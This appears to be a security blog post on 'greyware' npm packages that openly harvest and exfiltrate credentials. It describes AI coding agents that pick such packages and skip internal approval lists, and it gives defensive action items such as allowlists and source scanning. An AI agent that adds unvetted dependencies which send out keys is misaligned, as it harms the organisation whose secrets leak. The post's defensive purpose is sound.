Greyware in 52,000 Packages: Rethink Open-Source Security

Your marketing team recently used an AI agent to build a customer analytics dashboard. The agent selected three npm packages that seemed perfect: tracking user behavior, exporting data to CSV, and sending email notifications. However, one package also sent your API keys to an external server.

This is greyware, and it's changing the landscape of open-source security.

The Shift in Open-Source Security

Chainguard's source code scanner now analyzes over 100,000 packages daily, blocking more than 52,000 identified as malware or greyware. Unlike traditional malware that conceals its intent, greyware packages openly document their harmful functions. They harvest credentials, exfiltrate API keys, and establish persistent remote access, all while passing basic security scans because they don't hide their activities.

The catalyst: agentic development. AI coding assistants enable non-technical users to build applications by simply describing their needs. The AI agent searches package repositories, assembles dependencies, and generates working code. Your finance analyst can deploy a new reporting tool without understanding what require('helpful-analytics-sdk') actually does.

Key Findings

Traditional detection methods fall short. Signature-based scanners and behavioral analysis tools look for obfuscation or known attack vectors. Greyware packages document their credential harvesting in the README, listing "data synchronization with cloud services" as a feature. Your SAST tools flag nothing because there's no hidden payload.

Credential theft is a major threat. The packages Chainguard blocked were not installing backdoors or cryptominers. They systematically collected authentication tokens, database credentials, and cloud service keys, transmitting them to third-party servers as part of their "telemetry" or "analytics" features. Attackers seek persistent access to your infrastructure, not just a one-time payout.

The attack surface has expanded. When only developers wrote code, you could enforce package approval workflows. Now product managers, analysts, and operations teams can generate and deploy applications. They're not bypassing security controls maliciously—they're unaware of them. The AI agent doesn't check your internal package registry or approved dependencies list.

Source code analysis is essential. Chainguard's approach examines the actual code in packages, not just metadata or compiled artifacts. Greyware authors don't hide their functionality—they rely on users not reading the source. A package that backs up your environment variables to a remote server will include that code in plain sight.

Implications for Your Team

Your current dependency management strategy assumes malicious packages will try to hide. They won't. The next supply chain incident will likely come from a package that clearly states it collects and transmits data—in documentation your AI agent never showed to the person who approved the dependency.

Training every employee on secure coding isn't feasible. The point of agentic development is that non-technical users don't need to understand code. Telling your marketing team to "vet dependencies carefully" is like asking them to audit assembly code.

Your current tools may not help. If you're using Snyk, Dependabot, or similar tools, they're checking for known CVEs and malware signatures, not reading package source code to identify features that include credential exfiltration.

Action Items by Priority

Immediate: Inventory code deployment capabilities. Identify who can deploy code in your environment. This includes anyone using AI coding assistants, no-code platforms, or internal developer portals. You need to know the scope before you can control it.

This quarter: Implement source-level package scanning. Your pipeline needs to examine the actual code in dependencies, not just check them against vulnerability databases. If you're in the npm ecosystem, Chainguard's scanner targets this problem. For other ecosystems, use tooling that performs static analysis on third-party code and flags data exfiltration patterns.

Ongoing: Create an allowlist. Reactive scanning that blocks known-bad packages won't scale when non-technical users can add hundreds of dependencies through AI agents. Build an approved package registry and configure your AI tools to only pull from it. This creates necessary friction between "I need a CSV export library" and "I just deployed credential harvesting to production."

Strategic: Treat AI-generated code as untrusted input. Update your threat model to include "well-meaning employee using AI agent" as an attack vector. Apply the same controls you'd use for external contractors: sandboxed execution environments, limited credential scope, and mandatory code review before production deployment. The AI agent shouldn't get production database credentials just because a trusted employee is using it.

Compliance alignment: Map to existing frameworks. If you're under PCI DSS v4.0.1, this falls under Requirement 6.3.2 (security of bespoke and custom software). SOC 2 Type II requires monitoring changes to your production environment, including dependencies added by AI agents. Document how you're controlling this attack surface in your next audit.

OWASP Top Ten

Greyware Blocked in 52,000 Packages: What the Data Reveals

The Shift in Open-Source Security

Key Findings

Implications for Your Team

Action Items by Priority

You Might Also Like

Dependabot's Cooldown Won't Save You

AI Pentesting: A Security Engineer's Reference

AI Kill Switches: Five Myths Blocking Adoption